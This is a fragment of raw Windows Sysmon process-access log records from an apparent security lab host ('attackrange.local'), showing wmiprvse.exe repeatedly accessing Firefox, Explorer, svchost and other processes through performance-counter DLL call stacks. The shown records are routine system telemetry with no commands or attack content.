Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150789Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0E01-00000000D101}1072C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150788Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0E01-00000000D101}1072C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150787Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150786Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150785Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150784Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150783Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDF-60CA-9000-00000000D101}4560C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150782Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDF-60CA-9000-00000000D101}4560C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150781Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150780Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150779Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150778Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150777Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150776Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150775Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8600-00000000D101}2996C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150774Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 